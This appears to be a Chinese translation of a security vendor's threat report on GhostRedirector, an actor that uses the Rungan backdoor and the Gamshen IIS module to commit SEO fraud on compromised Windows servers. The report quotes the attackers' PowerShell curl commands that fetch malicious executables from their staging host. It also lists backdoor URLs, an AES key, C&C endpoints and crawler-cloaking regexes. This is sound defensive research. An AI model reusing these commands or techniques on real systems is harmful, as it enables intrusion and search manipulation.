GhostRedirector攻击Windows服务器：后门与SEO欺诈技术解析

ESET研究人员发现了一个新的威胁组织，我们将其命名为GhostRedirector，该组织已入侵了至少65台主要位于巴西、泰国和越南的Windows服务器。GhostRedirector使用了两种先前未记录的定制工具：一个我们命名为Rungan的被动C++后门，以及一个我们命名为Gamshen的恶意Internet信息服务（IIS）模块。

虽然Rungan能够在受感染服务器上执行命令，但Gamshen的目的是提供SEO欺诈即服务，即操纵搜索引擎结果，提升配置目标网站的页面排名。尽管Gamshen仅在请求来自Googlebot时修改响应——即它不会提供恶意内容或以其他方式影响网站的常规访问者——但参与SEO欺诈计划可能通过将其与 shady SEO技术和被提升的网站关联起来，损害受感染主机的网站声誉。

有趣的是，Gamshen是作为原生IIS模块实现的——IIS（Internet信息服务）是微软的Windows Web服务器软件，具有支持两种类型扩展的模块化架构：原生（C++ DLL）和托管（.NET程序集）。有多种恶意软件可以滥用此技术；我们2021年的白皮书《原生IIS恶意软件剖析》深入探讨了原生IIS威胁的类型及其架构。Gamshen属于特洛伊木马类别，主要目标是促进SEO欺诈，类似于我们之前记录的IISerpent。

除了Rungan和Gamshen，GhostRedirector还使用了一系列其他定制工具，以及公开已知的漏洞利用EfsPotato和BadPotato，在服务器上创建特权用户，该用户可用于以更高权限下载和执行其他恶意组件，或在Rungan后门或其他恶意工具从受感染服务器移除时用作备用手段。我们以中等置信度认为这些攻击背后是一个与中国结盟的威胁行为者。在本博客文章中，我们深入探讨了GhostRedirector用于入侵其受害者的工具库。

本博客文章的关键点

• 我们在2025年6月观察到至少65台Windows服务器被入侵。
• 受害者主要位于巴西、泰国和越南。
• 受害者不限于特定行业，而是涉及保险、医疗保健、零售、运输、技术和教育等多个行业。
• GhostRedirector开发了一个新的C++后门Rungan，能够在受害者的服务器上执行命令。
• GhostRedirector开发了一个恶意的原生IIS模块Gamshen，可以执行SEO欺诈；我们认为其目的是人为推广各种赌博网站。
• GhostRedirector依赖公共漏洞利用如BadPotato或EfsPotato在受感染服务器上进行权限提升。
• 基于各种因素，我们以中等置信度得出结论，这些攻击背后是一个先前未知的、与中国结盟的威胁行为者。我们将其命名为GhostRedirector。

归因

我们未能将此攻击归因于任何已知组织；因此我们创造了新名称GhostRedirector，以聚类本博客文章中记录的所有活动。这些活动始于2024年12月，但我们能够发现其他相关样本，使我们相信GhostRedirector自至少2024年8月以来一直活跃。

GhostRedirector拥有一个工具库，包括被动C++后门Rungan、恶意IIS特洛伊木马Gamshen以及各种其他实用程序。我们通过以下方式将这些工具聚类在一起：

• 它们在相同时间范围内出现在同一受感染服务器上，
• 共享的暂存服务器，以及
• 各种GhostRedirector工具的PDB路径的相似性，如下所述。

我们以中等置信度认为GhostRedirector是一个与中国结盟的威胁行为者，基于以下因素：

• GhostRedirector工具的多个样本具有硬编码的中文字符串，
• 攻击中使用了颁发给中国公司的代码签名证书，以及
• GhostRedirector在受感染服务器上创建的用户的密码之一包含单词“huang”，这是中文的“黄色”。

GhostRedirector并非已知的第一个通过恶意IIS模块进行SEO欺诈的与中国结盟的威胁行为者。去年，Cisco Talos发布了一篇关于名为DragonRank的与中国结盟的威胁行为者进行SEO欺诈的博客文章。两次攻击在受害者地理位置（泰国、印度和荷兰）和行业（医疗保健、运输和IT）方面存在一些重叠。然而，这些很可能是机会主义攻击，利用尽可能多的易受攻击服务器，而不是针对特定实体集。除了这些相似之处，我们没有理由相信DragonRank和GhostRedirector有关联，因此我们分别跟踪这些活动。

受害者分析

图1显示了受影响国家的热图，结合了两个来源的数据：

• ESET遥测，我们在2024年12月至2025年4月期间检测到这些攻击，以及
• 我们在2025年6月进行的互联网范围扫描，以更好地了解攻击规模，并使我们能够识别其他受害者。

我们通过互联网扫描识别出的所有受害者都收到了关于入侵的通知。

图1. 检测到受害者的国家

通过所有收集到的信息，我们发现全球至少有65台Windows服务器被入侵。大多数受影响的服务器位于巴西、秘鲁、泰国、越南和美国。请注意，大多数位于美国的受感染服务器似乎已出租给基于先前列表国家的公司。我们认为GhostRedirector更感兴趣的是针对南美和南亚的受害者。

此外，我们在以下国家观察到少量案例：

• 加拿大、
• 芬兰、
• 印度、
• 荷兰、
• 菲律宾、以及
• 新加坡。

GhostRedirector似乎对特定垂直行业或部门不感兴趣；我们已看到教育、医疗保健、保险、运输、技术和零售等部门的受害者。

初始访问

基于ESET遥测，我们认为GhostRedirector通过利用漏洞（可能是SQL注入）获得对其受害者的初始访问权限。然后它使用PowerShell下载各种恶意工具——全部来自同一暂存服务器868id[.]com。在某些情况下，我们看到攻击者利用不同的LOLBin CertUtil达到相同目的。

这一推测得到我们观察的支持，即大多数未经授权的PowerShell执行源自二进制文件sqlserver.exe，该文件持有存储过程xp_cmdshell，可用于在机器上执行命令。

以下是我们检测到在受感染服务器上执行的命令示例：

1
2
3
4
5

cmd.exe /d /s /c " powershell curl  https://xzs.868id[.]com/EfsNetAutoUser_br.exe -OutFile C:\ProgramData\EfsNetAutoUser_br.exe"
cmd.exe /d /s /c " powershell curl  http://xz.868id[.]com/EfsPotato_sign.exe -OutFile C:\ProgramData\EfsPotato_sign.exe"
cmd.exe /d /s /c "powershell curl  https://xzs.868id[.]com/link.exe  -OutFile C:\ProgramData\link.exe"
powershell  curl  https://xzs.868id[.]com/iis/br/ManagedEngine64_v2.dll -OutFile  C:\ProgramData\Microsoft\DRM\log\ManagedEngine64.dll
powershell  curl https://xzs.868id[.]com/iis/IISAgentDLL.dll -OutFile  C:\ProgramData\Microsoft\DRM\log\miniscreen.dll

我们还遇到GhostRedirector从同一暂存服务器下载后，在受感染的Web服务器上安装了GoToHTTP。GoToHTTP是一种良性工具，允许建立可以从浏览器访问的远程连接。

GhostRedirector使用目录C:\ProgramData\安装其恶意软件，特别是对于C++后门和IIS特洛伊木马，他们使用目录C:\ProgramData\Microsoft\DRM\log。

攻击概述

攻击概述如图2所示。攻击者入侵Windows服务器，下载并执行各种恶意工具：权限提升工具、投放多个Webshell的恶意软件、被动C++后门Rungan或IIS特洛伊木马Gamshen。权限提升工具的目的是在Administrators组中创建特权用户，以便GhostRedirector然后可以利用此帐户执行特权操作，或在组织失去对受感染服务器的访问权限时作为备用手段。

图2. 攻击概述

有害的Potatoes执行权限提升

作为其工具库的一部分，GhostRedirector创建了几个利用本地权限提升（LPE）策略的工具，可能基于公共EfsPotato和BadPotato漏洞利用。几乎所有分析的样本都使用.NET Reactor进行了混淆，具有多层混淆。一些样本使用由TrustAsia RSA Code Signing CA G3颁发给深圳市迪元素科技有限公司的代码签名证书有效签名，指纹为BE2AC4A5156DBD9FFA7A9F053F8FA4AF5885BE3C。

这些样本的主要目标是在受感染服务器上创建或修改用户帐户并将其添加到Administrators组。

在我们的分析过程中，我们从分析的样本中提取了以下用于创建这些恶意管理员用户的用户名。

• MysqlServiceEx
• MysqlServiceEx2
• Admin

图3显示了这些样本在成功LPE利用后用于创建用户的反编译代码。密码已因安全原因被编辑。

图3. 在受害服务器上创建新用户的反编译代码部分

如图3所示，这些权限提升工具使用名为CUserHelper的自定义C#类。此类在名为Common.Global.DLL（SHA-1: 049C343A9DAAF3A93756562ED73375082192F5A8）的DLL中实现，我们将其命名为Comdai，并嵌入在分析的样本中。我们相信Comdai是由与GhostRedirector工具库其余部分相同的开发人员创建的，基于它们各自PDB路径中的共享模式——参见重复的x5子字符串，如表1所示，该子字符串在Rungan、Gamshen和权限提升工具之间共享。

表1. 从GhostRedirector工具收集的PDB字符串

表2提供了在Comdai中实现的重要类的概述，这些类被GhostRedirector的各种权限提升工具使用，以及类行为的描述。注意ExeHelper类，它提供了一个函数来执行名为link.exe的文件——GhostRedirector使用相同的文件名部署GoToHTTP工具。

还要注意后门类功能，包括网络通信、文件执行、目录列表以及操纵服务和Windows注册表键。虽然我们尚未观察到任何已知的GhostRedirector组件使用这些方法，但这表明Comdai是一种多功能的工具，可以支持攻击的各个阶段。

表2. Comdai中实现的类

规则的一些例外

我们发现了一个样本（SHA-1: 21E877AB2430B72E3DB12881D878F78E0989BB7F）使用相同的证书，于2024年8月上传到VirusTotal，我们认为它与GhostRedirector的工具库相关，尽管我们在此活动期间未看到它被使用。这一假设基于样本的行为，该样本尝试打开文本文件并将其内容发送到硬编码URL。为此，样本包含嵌入的Comdai DLL，并调用Comdai C#类HttpHelper，该类具有硬编码URL https://www.cs01[.]shop——与表2中提到的相同域。

我们还发现了一些权限提升工具，其行为与先前提到的略有不同。

例如，在一种情况下（SHA-1: 5A01981D3F31AF47614E51E6C216BED70D921D60），它不是创建新用户，而是更改现有用户Guest的密码为恶意软件中硬编码的密码，然后使用RID劫持技术尝试将此用户添加到管理员组。

在另一种情况下（SHA-1: 9DD282184DDFA796204C1D90A46CAA117F46C8E1），该工具不仅创建新的管理员用户，还在受害者服务器的特定路径上安装多个Webshell，由GhostRedirector作为参数手动提供给该工具。

这些Webshell以明文形式嵌入在样本的资源中，名称是硬编码的；我们看到的名称有：

• C1.php
• Cmd.aspx
• Error.aspx
• K32.asxp
• K64.aspx
• LandGrey.asp

Zunput，网站信息收集器加Webshell投放器

GhostRedirector使用的另一个有趣工具具有文件名SitePuts.exe。此样本（SHA-1: EE22BA5453ED577F8664CA390EB311D067E47786），我们命名为Zunput，也是使用.NET Framework开发的，并使用上述证书签名；它读取IIS配置系统寻找配置的网站，并获取关于它们的以下信息：

• 服务器上的物理路径，
• 名称，以及
• 对于每个站点，以下属性：
  • 协议
  • IP地址，以及
  • 主机名

一旦信息被收集，Zunput检查服务器上物理路径的存在，并验证目录是否包含至少一个具有.php、.aspx或.asp扩展名的文件。这样，Zunput仅针对能够执行动态内容的活跃网站——仅在这些目录中它才投放嵌入的Webshell。Webshell嵌入在样本的资源中，对于每个Webshell的日期（创建、修改、访问），恶意软件使用目录中现有文件的日期。

Webshell使用ASP、PHP和JavaScript编写，使用的名称从以下列表中随机选择：

• Xml
• Ajax
• Sync
• Loadapi
• Loadhelp
• Code
• Jsload
• Loadcss
• Loadjs
• Pop3
• Imap
• Api

用于Webshell的扩展名：

• .cer
• .pjp
• .asp
• .aspx

Zunput执行期间收集的信息保存在名为log.txt的文件中（参见图4中的示例），位于执行它的目录中。此信息不会由Zunput自动外泄，但攻击者可以通过几种方法获取；一种可能是通过先前部署的Webshell。

图4. 保存的log.txt内容示例，其中“分割线”机器翻译为“Dividing line”

最终有效载荷

Rungan，一个被动C++后门

Rungan（SHA-1: 28140A5A29EBA098BC6215DDAC8E56EACBB29B69）是一个被动C/C++后门，我们已看到安装在C:\ProgramData\Microsoft\DRM\log\miniscreen.dll。

此后门使用AES CBC模式进行字符串解密。030201090405060708090A0B0C0D0E0F用于IV和密钥，基于恶意软件的PDB路径F:\x5\AvoidRandomKill-main\x64\Release\IISAgentDLL.pdb，我们认为GhostRedirector重用了AvoidRandomKill存储库中的AES实现。

此后门的主要功能是在受感染服务器上注册一个明文硬编码URL http://+:80/v1.0/8888/sys.html，通过滥用HTTP Server API绕过IIS。然后后门等待匹配该URL的请求，解析并在受感染服务器上执行接收到的命令。

额外的URL可以在名为C:\Windows\Microsoft.NET\Framework64\v2.0.50727\1033\vbskui.dll的可选配置文件中设置。Rungan将侦听所有匹配配置模式的传入请求，并且配置可以通过后门命令更新。要激活后门，任何传入HTTP请求必须包含特定的参数和值组合，这些组合在Rungan中硬编码。

一旦满足此检查，Rungan使用参数action确定后门命令，并使用HTTP请求正文中的数据作为命令参数。C&C协议中不使用加密或编码。最显著的功能是在受害者的服务器上创建新用户或执行命令；后门命令的完整列表如表3所示。

表3. Rungan后门命令

图5和图6显示了在模拟环境中使用工具postman对恶意软件进行动态分析期间发出的不同请求示例。

图5. 在测试服务器上执行命令

图6. 通过恶意软件在测试服务器上添加用户

Gamshen，恶意IIS模块

作为C/C++ DLL开发的Gamshen是一个恶意的原生IIS模块。此恶意软件的主要功能是拦截从Googlebot搜索引擎爬虫对受感染服务器发出的请求，并且仅在该情况下修改服务器的合法响应。响应基于从Gamshen的C&C服务器动态请求的数据进行修改。通过这样做，GhostRedirector尝试通过使用操纵性的 shady SEO技术（例如从合法的受感染网站创建人工反向链接到目标网站）来操纵特定第三方网站的Google搜索排名。我们之前记录了一个使用类似策略的IIS特洛伊木马案例：参见IISerpent：恶意软件驱动的SEO欺诈即服务。

重要的是要提到，访问受影响网站的常规用户不会看到任何更改，并且不会受到恶意行为的影响，因为Gamshen不会在来自常规访问者的请求上触发任何恶意活动。

图7显示了参与IIS SEO欺诈方案的恶意模块在从Google爬虫（又名Googlebot）发出请求时如何修改受感染服务器的合法响应。

图7. SEO欺诈方案概述

为了做到这一点，攻击者为实现以下IIS事件处理程序实现了自己的恶意代码：

• OnBeginRequest
• OnPreExecuteRequestHandler
• OnPostExecuteRequestHandler
• OnSendResponse

当受感染服务器收到HTTP请求时，请求经过IIS请求处理管道，该管道在过程的各个步骤触发这些处理程序——值得注意的是，OnSendResponse处理程序在受感染服务器发送HTTP响应之前触发。由于Gamshen是作为IIS模块安装的，它自动在这些步骤拦截每个传入的HTTP请求，并执行三个操作。

首先，它执行一系列验证以仅过滤感兴趣的HTTP请求：

• 请求必须源自Google爬虫：User-Agent标头包含字符串Googlebot，或Referer包含字符串google.com。
• HTTP方法不能是POST。
• 请求的资源不是图像、样式表或类似的静态资源，即它不具有以下任何扩展名：.jpg、.resx、.png、.jpeg、.bmp、.gif、.ico、.css或.js。这可能是为了避免破坏UI功能。
• URL必须包含字符串android_或匹配以下任何正则表达式：
  • [/]?(android|plays|articles|details|iosapp|topnews|joga)([0-9]{6,20})(/|\.\w+)?
  • [/]?(android|plays|articles|details|iosapp|topnews|joga)([a-zA-Z0-9]{6,8})\/([a-zA-Z0-9_]{6,20})(/|\.\w+)?
  • [/]?(android|plays|articles|details|iosapp|topnews|joga)\/([0-9_]{6,20})(/|\.\w+)?
  • [/]?(android|plays|articles|details|iosapp|topnews|joga)\/([a-zA-Z]{8,10})(/|\.\w+)?
  • [/]?([a-zA-Z0-9]{6,8})\/([a-zA-Z0-9]{6,8})(/|\.phtml|\.xhtml|\.phtm|\.shtml)
  • [/]?([a-zA-Z0-9_]{14})(/|\.html|\.htm)
  • [/]?([a-zA-Z0-9]{6})\/([a-zA-Z0-9]{8})(/|\.html|\.htm)
  • [/]?([a-z0-9]{6})\.xhtml

其次，Gamshen使用从其自己的C&C服务器brproxy.868id[.]com获取的数据修改针对搜索引擎爬虫的响应。我们观察到用于此目的的三个URL：

• https://brproxy.868id[.]com/index_base64.php?<ORIGINAL_URL>
• https://brproxy.868id[.]com/tz_base64.php?<ORIGINAL_URL>
• https://brproxy.868id[.]com/url/index_base64.php

在所有情况下，使用以下硬编码User-Agent字符串：Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)。期望一个base64编码的响应，然后解码并注入到针对搜索引擎爬虫的HTTP响应中。

最后，在请求处理管道的最后一步，就在HTTP响应发送之前——OnSendResponse事件处理程序验证这些爬虫请求的响应。如果响应具有404 HTTP状态代码——即Gamshen未能从其C&C服务器获取恶意数据，则它改为执行重定向到不同的C&C服务器：http://gobr.868id[.]com/tz.php。

我们未能从brproxy.868id[.]com或gobr.868id[.]com获得响应，但相信数据支持 shady SEO技术——例如关键词填充、插入恶意反向链接——或者在重定向的情况下，使搜索引擎将受感染网站与目标第三方网站关联起来，从而污染搜索索引。

然而，我们能够在VirusTotal上对这些域进行透视并找到相关图像——在这种情况下，是为葡萄牙语用户宣传赌博应用程序的图像。我们认为此网站是SEO欺诈方案的受益者，由该恶意IIS模块Gamshen促进——Gamshen可能尝试入侵尽可能多的网站并滥用其声誉将流量驱动到此第三方网站。

图8和图9显示了GhostRedirector可能在其SEO欺诈方案中使用的两张图像。

图8. 可能从SEO欺诈方案中受益的赌博网站（机器翻译：VIP会员的福利和特权）

图9. 可能从SEO欺诈方案中受益的赌博网站（机器翻译：无忧大额存款和取款）

结论

在本博客文章中，我们介绍了一个先前未知的、与中国结盟的威胁行为者GhostRedirector，及其用于入侵和滥用Windows服务器的工具包。除了在受感染服务器上启用远程命令执行外，GhostRedirector还部署了一个恶意IIS模块Gamshen，旨在通过 shady SEO策略操纵Google搜索结果。Gamshen滥用托管在受感染服务器上的网站的信誉来推广第三方赌博网站——可能是参与SEO欺诈即服务方案的付费客户。

GhostRedirector还通过在受感染服务器上部署多个远程访问工具，以及在创建流氓用户帐户的基础上，展示了持久性和操作弹性，所有这些都旨在维持对受感染基础设施的长期访问。

缓解建议可以在我们的综合白皮书中找到。对于任何与主题相关的查询或样本提交，请通过threatintel@eset.com联系我们。

IoCs

全面的危害指标（IoCs）和样本列表可以在我们的GitHub存储库中找到。

文件

网络

MITRE ATT&CK 技术

此表使用MITRE ATT&CK框架版本17构建。